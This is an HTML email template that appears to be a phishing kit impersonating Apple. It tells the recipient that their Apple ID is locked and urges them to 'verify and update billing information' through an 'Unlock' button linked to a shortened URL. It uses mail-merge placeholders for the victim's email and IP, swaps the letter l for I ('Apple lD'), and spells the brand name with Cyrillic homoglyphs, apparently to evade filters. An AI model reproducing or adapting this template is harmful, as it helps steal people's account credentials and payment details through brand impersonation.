﻿
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<style type="text/css">
a {text-decoration:none; color:#0088cc}


body {width:100% !important}
@media only screen and (max-device-width:768px) {
	#aapl-footer a,a {color:inherit}
}

@media only screen and (-webkit-min-device-pixel-ratio:1.5),
       only screen and (min-device-pixel-ratio:1.5) {
		img {visibility:hidden}
		*[class=more] {visibility:visible}
		background-position:top right}
}

/* PHONE STYLES - For clients that support media queries */
@media only screen and (max-width:700px) {
	td[class="container"] {padding:5px!important}
	td[class="content"]{padding-left:20px!important;padding-right:20px!important}
	table {width:auto!important}
	table[class='responsive'],
	table[class='responsive'] tbody,
	table[class='responsive'] tr,
	table[class='responsive'] td {display:block}
	tr[class='promos'] {max-width:700px!important}
	table[class='promo'] {display:block;width:99.8%!important;margin:0 auto}
	td[class='promo-container'] {display:block!important;width:100%!important;float:left!important}
	td[class='promo-spacer'] {display:none}
	td img {max-width:100%!important; height:auto!important}
	td[class='copyright'] {-webkit-text-size-adjust:100%!important}
}

</style>
<!--[if gte mso 9]>
<style type="text/css">
table,td,div,p {font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif !important;line-height:normal !important}
</style>
<![endif]-->
<!--[if lte mso 7]>
<style type="text/css">
table,td,div,p {font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif !important;line-height:normal}
</style>
<![endif]-->
</head>
<body bgcolor="#f5f5f5" style="min-height:1000px;margin:0;padding:0">
<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
 <td></td>
  </tr>
<tr>
<td class="container" style="padding:27px 20px 40px 20px;background-color:#f5f5f5;max-width:700px">
<!-- BEGIN MAIN CONTENT -->
	<table width="700" border="0" cellspacing="0" cellpadding="0" align="center" style="margin:0 auto">
		<tr>
			<td width="100%" style="-webkit-box-shadow:0 8px 6px -7px #cccccc;-moz-box-shadow:0 8px 6px -7px #cccccc;box-shadow:0 8px 6px -7px #cccccc">
				<table width="100%" border="0" cellspacing="0" cellpadding="0" align="left" style="margin:0 auto;border:1px solid #d2d2d2;-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px">
					<tr>
						<td bgcolor="#ffffff" width="100%" height="21" style="-webkit-border-top-left-radius:5px;-webkit-border-top-right-radius:5px;-moz-border-radius-topleft:5px;-moz-border-radius-topright:5px;border-top-left-radius:5px;border-top-right-radius:5px"></td>
					</tr>
					<tr>
						<td align="right" bgcolor="#ffffff" style="padding:0 19px 0 21px">
							<table width="100%" border="0" cellspacing="0" cellpadding="0">
							</table>
						</td>
					</tr>
					<tr>
						<td bgcolor="#ffffff" width="100%" height="12"></td>
					</tr>
					<tr>
						<td class="content" bgcolor="#ffffff" style="padding:0 50px 62px;-webkit-border-bottom-right-radius:5px;-webkit-border-bottom-left-radius:5px;-moz-border-radius-bottomright:5px;-moz-border-radius-bottomleft:5px;border-bottom-right-radius:5px;border-bottom-left-radius:5px">
							<!-- Nested padding for body -->
							<table>
								<tr>
									<td bgcolor="#ffffff">
										<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
											<tr>
												<td width="600" valign="top" align="center" style="padding-bottom:49px;margin:0;font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif;color:#292929;font-size:26px;line-height:1.2em;font-weight:bold">
													<!-- TEMPLATE: ADD MAIN TITLE -->
													Your Apple ID has been locked
												</td>
											</tr>
										</table>
									</td>
								</tr>
								<tr>
									<td bgcolor="#ffffff" style="-webkit-border-bottom-right-radius:5px;-webkit-border-bottom-left-radius:5px;-moz-border-radius-bottomright:5px;-moz-border-radius-bottomleft:5px;border-bottom-right-radius:5px;border-bottom-left-radius:5px">
										<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
											<tr>
												<td width="100%" valign="top" style="">
													<!--BODY COPY-->
													<table width="100%" border="0" cellspacing="0" cellpadding="0">
														<tr>
															<td style="padding:4px 0 20px;margin:0;font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif;color:#797979;font-size:14px;line-height:1.6em">
Your Apple&nbsp;lD (<b><#[email]#></b>)
														</tr>
														<tr>
															<td align="left" style="padding: 4px 0 0 0; font-size: 14px; line-height: 1.5em; font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif; color: #797979;" class="padding-copy"><br>For your protection, your Apple lD ls automatlcally dlsabled.<br>we detect unauthorized login Attempts to your Apple lD from other lP location.<br>Please verify your ldentity
today or your account will be disabled due to concerns we have for the safety and lntegrity of the Apple Comunity.</td>
														</tr>
														<tr>														
															<td align="left" style="padding: 4px 0 0 0; font-size: 14px; line-height: 1.6em; font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif; color: #797979;" class="padding-copy"><br>Date and Time: <#[date]#><br>Browser: <#[browser]#><br>Operating System: <#[os]#><br>Ip: <#[ip]#></td>
														</tr>
														<tr>
															<td align="left" style="padding: 4px 0 0 0; font-size: 14px; line-height: 1.5em; font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif; color: #797979;" class="padding-copy"><br>What To Do Next
To verify your Apple lD, we recommend that you Verify And Update your billing information to proof the ID is yours,</td>
														</tr>
														<tr>
															<td style="padding:7px 0 19px;margin:0;font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif;color:#797979;font-size:14px;line-height:1.6em">
																<!-- TEMPLATE: ADD BUTTON -->
														<br>
															<center>
																<a href="https://u.nu/3pvm" class="aapl-link" style="background:#3071CE; background-image: -o-linear-gradient(-90deg, #4BB1EB 0%, #3071CE 100%) !important; background-image:-moz-linear-gradient(-90deg, #4BB1EB 0%, #3071CE 100%) !important; background-image: -webkit-linear-gradient(-90deg, #4BB1EB 0%, #3071CE 100%) !important; background-image: -ms-linear-gradient(-90deg, #4BB1EB 0%, #3071CE 100%) !important; background-image: linear-gradient(-180deg, #4BB1EB 0%, #3071CE 100%) !important; -moz-box-shadow: 0px 1px 1px 0px #B3B3B3, inset 0px 1px 2px 0px #8CCBF1; -webkit-box-shadow: 0px 1px 1px 0px #B3B3B3, inset 0px 1px 2px 0px #8CCBF1; box-shadow: 0px 1px 1px 0px #B3B3B3, inset 0px 1px 2px 0px #8CCBF1; display:inline-block; color:#FFF; text-shadow:0px -1px 1px #235F94; border-radius:40px; border:1px solid #235F94; height:28px; padding:0 20px; line-height:28px; text-decoration:none;" >Unlock</a>
															</center>
															</td>
														</tr>
														<tr>
															<td style="padding:7px 0 0 0;margin:0;font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif;color:#797979;font-size:14px;line-height:1.6em">
																<!-- TEMPLATE: ADD SIGNATURE -->
																Sincerely,<br /><br />
 														
																Аpрle Support
															</td>
														</tr>
													</table>
												</td>
											</tr>
										</table>
									</td>
								</tr>
							</table>
						</td>
					</tr>
				</table>
			</td>
		</tr>
	</table>

<!--BEGIN LEGAL FOOTER-->
<table width="700" border="0" cellspacing="0" cellpadding="0" align="center" id="aapl-footer" style="margin:0 auto">
	<tr>
		<td style="padding:24px 20px 10px 20px">
			<!--ADD LEGAL INFO-->
			<table width="100%" border="0" cellspacing="0" cellpadding="0">
				<tr>
					<td class="copyright" style="padding:0 0 20px; font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif;font-size:11px;line-height:1.64em;text-align:left;color:#b7b7b7">
						<!-- TEMPLATE: ADD FOOTER CONTENT -->
						Please feel free to use support. You can check the details of the product, download the latest software update, share hints and solutions with other users. Also,You can choose the method that is most suitable for you.<br /><br />
					</td>
				</tr>
				<tr>
					<td class="copyright" style="font-family:Helvetica Neue, Helvetica, Arial, Verdana, sans-serif;font-size:11px;line-height:1.34em;text-align:center;color:#b7b7b7"> 
						<!-- TEMPLATE: ADD COPYRIGHT CONTENT -->
						TM and Copyright © 2017&nbsp;Аpрle Inc. All rights reserved.<br />
						<a href="https://u.nu/3pvm" style="color:#b7b7b7;text-decoration:underline">Аpрle ID</a> | <a href="https://apple.com" style="color:#b7b7b7;text-decoration:underline">Support</a> | <a href="https://apple.com" style="color:#b7b7b7;text-decoration:underline">Privacy Policy</a> 
					</td>
				</tr>
			</table>
		</td>
	</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
